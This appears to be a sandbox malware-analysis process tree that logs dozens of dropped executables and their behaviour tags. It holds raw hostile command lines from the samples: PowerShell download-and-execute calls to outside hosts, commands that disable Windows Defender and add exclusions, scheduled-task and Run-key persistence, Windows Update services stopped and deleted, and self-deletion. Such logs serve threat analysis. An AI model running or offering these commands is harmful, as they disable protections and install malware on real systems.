- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3620

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k3926395.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k3926395.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l0362568.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l0362568.exe
5⤵
PID:3508

C:\Users\Admin\AppData\Local\Temp\7968320020\foto124 (2).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\foto124 (2).exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2396

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\x2364073.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\x2364073.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1048

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\x6871506.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\x6871506.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4708

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\f9783908.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\f9783908.exe
5⤵
- Executes dropped EXE
PID:2860

C:\Users\Admin\AppData\Local\Temp\7968320020\a2592d.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\a2592d.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1616

C:\Users\Admin\AppData\Local\Temp\7968320020\a2592d.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\a2592d.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4868

C:\Users\Admin\AppData\Local\Temp\7968320020\fotod25 (2).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\fotod25 (2).exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3012

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\y5037476.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\y5037476.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1684

C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\y3114491.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\y3114491.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2720

C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\k3926395.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\k3926395.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\l0362568.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\l0362568.exe
5⤵
PID:4740

C:\Users\Admin\AppData\Local\Temp\7968320020\Sceatt.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\Sceatt.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1932

C:\Users\Admin\AppData\Local\Temp\7968320020\Sceatt.exe
C:\Users\Admin\AppData\Local\Temp\7968320020\Sceatt.exe
3⤵
- Executes dropped EXE
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 796
4⤵
- Program crash
PID:440

C:\Users\Admin\AppData\Local\Temp\7968320020\secmorganzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\secmorganzx.exe"
2⤵
- Executes dropped EXE
PID:2420

C:\Users\Admin\AppData\Local\Temp\7968320020\eee23xe.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\eee23xe.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2344

C:\Users\Admin\AppData\Local\Temp\7968320020\eee23xe.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\eee23xe.exe"
3⤵
- Executes dropped EXE
PID:2484

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd.exe"
2⤵
- Executes dropped EXE
PID:412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 572
3⤵
- Program crash
PID:1380

C:\Users\Admin\AppData\Local\Temp\7968320020\Dollar.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\Dollar.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4936

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:3456

C:\Users\Admin\AppData\Local\Temp\7968320020\H2.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\H2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:2840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4840

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (2).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (2).exe"
2⤵
PID:4664

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (2).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (2).exe"
3⤵
PID:6720

C:\Users\Admin\AppData\Local\Temp\7968320020\2.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\2.exe"
2⤵
PID:1500

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (3).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (3).exe"
2⤵
PID:4780

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (3).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (3).exe"
3⤵
PID:7056

C:\Users\Admin\AppData\Local\Temp\7968320020\DIV.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\DIV.exe"
2⤵
PID:2744

C:\Users\Admin\AppData\Local\Temp\7968320020\teambzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\teambzx.exe"
2⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\7968320020\teambzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\teambzx.exe"
3⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\7968320020\cc.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\cc.exe"
2⤵
PID:2272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 948
3⤵
- Program crash
PID:5444

C:\Users\Admin\AppData\Local\Temp\7968320020\WindowsApp1.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\WindowsApp1.exe"
2⤵
PID:4772

C:\Users\Admin\AppData\Local\Temp\7968320020\grace.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\grace.exe"
2⤵
PID:4292

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (4).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (4).exe"
2⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (4).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (4).exe"
3⤵
PID:7012

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (5).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (5).exe"
2⤵
PID:5008

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (5).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (5).exe"
3⤵
PID:3796

C:\Users\Admin\AppData\Local\Temp\7968320020\M.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\M.exe"
2⤵
PID:4360

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\7968320020\ga.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\ga.exe"
2⤵
PID:3484

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:2416

C:\Users\Admin\AppData\Local\Temp\7968320020\Nano.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\Nano.exe"
2⤵
PID:1792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:4212

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (6).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (6).exe"
2⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (6).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (6).exe"
3⤵
PID:2200

C:\Users\Admin\AppData\Local\Temp\7968320020\agodzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\agodzx.exe"
2⤵
PID:5144

C:\Users\Admin\AppData\Local\Temp\7968320020\agodzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\agodzx.exe"
3⤵
PID:6780

C:\Users\Admin\AppData\Local\Temp\7968320020\smss.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\smss.exe"
2⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\7968320020\smss.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\smss.exe"
3⤵
PID:5752

C:\Users\Admin\AppData\Local\Temp\7968320020\R.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\R.exe"
2⤵
PID:5624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5900

C:\Users\Admin\AppData\Local\Temp\7968320020\ar.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\ar.exe"
2⤵
PID:5888

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:6020

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:6112

C:\Users\Admin\AppData\Local\Temp\7968320020\ARR.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\ARR.exe"
2⤵
PID:6052

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5472

C:\Users\Admin\AppData\Local\Temp\7968320020\D.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\D.exe"
2⤵
PID:5524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5704

C:\Windows\SysWOW64\colorcpl.exe
"C:\Windows\SysWOW64\colorcpl.exe"
2⤵
PID:5832

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:8076

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8076 -s 136
4⤵
- Program crash
PID:8372

C:\Windows\SysWOW64\control.exe
"C:\Windows\SysWOW64\control.exe"
2⤵
PID:6088

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:8796

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (7).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (7).exe"
2⤵
PID:2520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\AhfVzhJ.exe"
3⤵
PID:6880

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AhfVzhJ" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD8AD.tmp"
3⤵
- Creates scheduled task(s)
PID:7388

C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (7).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\hkcmd (7).exe"
3⤵
PID:7936

C:\Users\Admin\AppData\Local\Temp\7968320020\NEV.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\NEV.exe"
2⤵
PID:5432

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5844

C:\Users\Admin\AppData\Local\Temp\7968320020\ogumbgejapxd.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\ogumbgejapxd.exe"
2⤵
PID:4516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\7968320020\ogumbgejapxd.exe
3⤵
PID:4776

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:5704

C:\Users\Admin\AppData\Local\Temp\7968320020\jokerzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\jokerzx.exe"
2⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\7968320020\jokerzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\jokerzx.exe"
3⤵
PID:8016

C:\Users\Admin\AppData\Local\Temp\7968320020\ventascry.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\ventascry.exe"
2⤵
PID:5284

C:\Users\Admin\AppData\Local\Temp\7968320020\ventascry.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\ventascry.exe"
3⤵
PID:1760

C:\Users\Admin\AppData\Local\Temp\7968320020\wasx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\wasx.exe"
2⤵
PID:6036

C:\Users\Admin\AppData\Local\Temp\7968320020\wasx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\wasx.exe"
3⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\7968320020\dd.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\dd.exe"
2⤵
PID:4856

C:\Users\Admin\AppData\Local\Temp\7968320020\dd.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\dd.exe"
3⤵
PID:5860

C:\Users\Admin\AppData\Local\Temp\7968320020\postmon.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\postmon.exe"
2⤵
PID:6092

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')"
3⤵
PID:5792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')
4⤵
PID:6456

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\7968320020\postmon.exe" >> NUL
3⤵
PID:5252

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:6816

C:\Users\Admin\AppData\Local\Temp\7968320020\U2th5k1keGkDeMw.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\U2th5k1keGkDeMw.exe"
2⤵
PID:5948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:1432

C:\Users\Admin\AppData\Local\Temp\7968320020\Fecurity.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\Fecurity.exe"
2⤵
PID:4320

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:6960

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:6972

C:\Users\Admin\AppData\Local\Temp\7968320020\red.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\red.exe"
2⤵
PID:1856

C:\Users\Admin\AppData\Local\Temp\7968320020\javaw.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\javaw.exe"
2⤵
PID:6272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:6496

C:\Users\Admin\AppData\Local\Temp\7968320020\Facebook.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\Facebook.exe"
2⤵
PID:6464

C:\Users\Admin\AppData\Local\Temp\7968320020\141.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\141.exe"
2⤵
PID:6708

C:\Users\Admin\AppData\Local\Temp\7968320020\photo430.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\photo430.exe"
2⤵
PID:6928

C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\v0818119.exe
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\v0818119.exe
3⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\v9805585.exe
C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\v9805585.exe
4⤵
PID:7016

C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\a1461629.exe
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\a1461629.exe
5⤵
PID:7072

C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\b6905585.exe
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\b6905585.exe
5⤵
PID:6148

C:\Users\Admin\AppData\Local\Temp\7968320020\fristname.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\fristname.exe"
2⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe
"C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe"
3⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe
"C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe"
3⤵
PID:2272

C:\Users\Admin\AppData\Local\Temp\Builtt.exe
"C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
3⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\Builtt.exe
"C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
4⤵
PID:6292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
5⤵
PID:6924

C:\Windows\system32\net.exe
net session
6⤵
PID:6364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
7⤵
PID:6228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
5⤵
PID:6612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
6⤵
PID:7364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
5⤵
PID:4696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
6⤵
PID:7372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:6420

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:8032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:6688

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
PID:7984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
5⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
6⤵
PID:8048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'"
5⤵
PID:5920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'
6⤵
PID:7468

C:\Users\Admin\AppData\Local\Temp\7968320020\IE_CACHE.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\IE_CACHE.exe"
2⤵
PID:6664

C:\Users\Admin\AppData\Local\Temp\7968320020\d9ff4ed3.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\d9ff4ed3.exe"
2⤵
PID:6920

C:\Users\Admin\AppData\Local\Temp\7968320020\wall.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\wall.exe"
2⤵
PID:6360

C:\Users\Admin\AppData\Local\Temp\aafg31.exe
"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
3⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe
"C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe"
3⤵
PID:1140

C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
"C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
4⤵
PID:6312

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe" /F
5⤵
- Creates scheduled task(s)
PID:7116

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\6d73a97b0c" /P "Admin:N"&&CACLS "..\6d73a97b0c" /P "Admin:R" /E&&Exit
5⤵
PID:5232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:7752

C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:N"
6⤵
PID:6756

C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:R" /E
6⤵
PID:6156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:6848

C:\Windows\SysWOW64\cacls.exe
CACLS "..\6d73a97b0c" /P "Admin:N"
6⤵
PID:8888

C:\Windows\SysWOW64\cacls.exe
CACLS "..\6d73a97b0c" /P "Admin:R" /E
6⤵
PID:4420

C:\Users\Admin\AppData\Local\Temp\1000022001\postmon.exe
"C:\Users\Admin\AppData\Local\Temp\1000022001\postmon.exe"
5⤵
PID:7812

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.drgenov.com/wp-content/uploads/debug2.ps1')"
6⤵
PID:4108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.drgenov.com/wp-content/uploads/debug2.ps1')
7⤵
PID:8236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000022001\postmon.exe" >> NUL
6⤵
PID:8540

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
7⤵
- Runs ping.exe
PID:9012

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
5⤵
PID:8732

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
6⤵
PID:7808

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7808 -s 644
7⤵
- Program crash
PID:8124

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
3⤵
PID:3228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
4⤵
PID:4504

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:2824

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:5392

C:\Windows\System32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:8

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:5892

C:\Windows\System32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:4364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
4⤵
PID:9116

C:\Users\Admin\AppData\Local\Temp\7968320020\WWW3_64.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\WWW3_64.exe"
2⤵
PID:7136

C:\Users\Admin\AppData\Local\Temp\7968320020\gogw.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\gogw.exe"
2⤵
PID:4600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe"
3⤵
PID:3420

